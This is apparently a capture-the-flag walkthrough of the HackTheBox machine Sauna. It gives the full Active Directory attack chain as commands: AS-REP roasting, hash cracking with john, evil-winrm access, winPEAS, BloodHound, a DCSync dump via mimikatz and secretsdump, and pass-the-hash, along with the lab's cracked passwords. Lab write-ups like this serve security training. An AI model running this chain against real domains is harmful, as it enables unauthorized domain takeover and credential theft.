Introduction

Today we are going to solve a HTB machine named Sauna. Sauna is an easy difficulty Windows machine that features Active Directory enumeration and exploitation.

The credit for making this lab goes to egotisticalSW.

Level: Easy

Penetration Testing Methodology:

Recon

• Nmap

Enumeration

• Web application
• username-anarchy

Exploitation (Initial Access)

• AS-REP Roasting
• john the ripper
• evil-winrm

Privilege Escalation

• winPEASx64
• bloodhound-python
• DCSync
• mimkatz
• impacket-secretsdump
• Pass The Hash
• Capture the Flag

Walkthrough

Recon

Starting the enumeration with port and service scan by running nmap.

nmap -sV 10.129.128.245

Nmap results suggests the Domain name as EGOTISTICAL-BANK.LOCAL

Enumeration

At port 80, there is a website running in which there is an About Us page containing the list of team members.

In order to create a list of users from the About Us page, username-anarchy tool was used which can be downloaded from: https://github.com/urbanadventurer/username-anarchy

Also, creating a username.txt file which contains all the team members’ name.

Using the username.txt as input in the username-anarchy tool to generate a users.txt file which will comprises of all the names as first,last,first.last,flast format.

./username-anarchy --input-file username.txt --select-format first,last,first.last,flast > users.txt

Before starting any exploitation, performing the host entry in the /etc/hosts file for the target machine IP.

Exploitation

During the enumeration, it was observed that the port 88 i.e., Kerberos service port is open. The attacks related with the port 88 can be performed through this article : https://viperone.gitbook.io/pentest-everything/everything/ports/port-88-or-kerberos

So, the AS-REP roasting can be tried here.

AS-REP roasting is a technique that allows retrieving password hashes of users that have Do not require Kerberos preauthentication property selected.

Since we already have a list of users and the Kerberos service enabled, we will use the impacket-GetNPUsers script inside kali that will allow us to capture the users’ hashes.

It can be seen that fsmith user’s hash is obtained after successful AS-REP roasting attack.

impacket-GetNPUsers -dc-ip 10.129.128.245 EGOTISTICAL-BANK.LOCAL/ -usersfile users.txt

Copying the obtained hash into a file named hashes.

Cracking the above obtained hash using john the ripper tool.

john --wordlist=/usr/share/wordlists/rockyou.txt hashes

It can be seen that the password for the fsmith user is Thestrokes23.

Initial Access

The initial access can be taken by login into the target system using evil-winrm.

evil-winrm -I 10.129.128.245 -u fsmith -p Thestrokes23

Privilege Escalation

To perform privilege escalation, winPEASx64.exe is transferred into the target system using the upload command through evil-winrm.

Running the winPEASx64.exe after it is transferred.

Winpeas output showed a set of credentials for the domain user svc_loanmanager as Moneymakestheworldgoround!.

After login using the svc_loanmanager user, it was observed that there was a local user by the name svc_loanmgr. So tried using the same password for the svc_loanmgr user and it worked. Now to further enumerate, bloodhound can be used to map the Active Directory rights and permissions.

An overview of the Active Directory structure can be taken using the bloodhound-python script. The following command would generate the .json files which can be later imported into the Bloodhound (neo4j database) to analyse the results.

bloodhound-python -u svc_loanmgr -p 'Moneymakestheworldgoround!' -ns 10.129.128.245 -d EGOTISTICAL-BANK.LOCAL -c All

Starting the neo4j as console application,

Running the bloodhound and importing all the .json files.

It can be seen that the svc_loanmgr user had DCSync Rights on the Domain Controller. So, here DCSync attack can be performed which allows the user to request any user credentials from the domain.

The credentials can be dumped using mimikatz.exe or impacket-secretsdump script. Here we will be using both the methods, first starting with the mimikatz.exe.

After mimikatz.exe is transferred, running the following command:

./mimikatz.exe "lsadump::dcsync /user:Administrator" "exit"

The above command can be used to dump the NTLM hash of the Administrator user.

Similar NTLM hash can be obtained using the impacket-secretsdump script.

The following command can be used to dump the hash:

impacket-secretsdump egotistical-bank/svc_loanmgr@10.129.128.245 -just-dc-user Administrator

Finally, the obtained hash can be used to login into the target system as Administrator using Pass the Hash attack.

evil-winrm can be used to perform the attack and login into the target system as Administrator.

Author: Vinayak Chauhan is an InfoSec researcher and Security Consultant. Contact here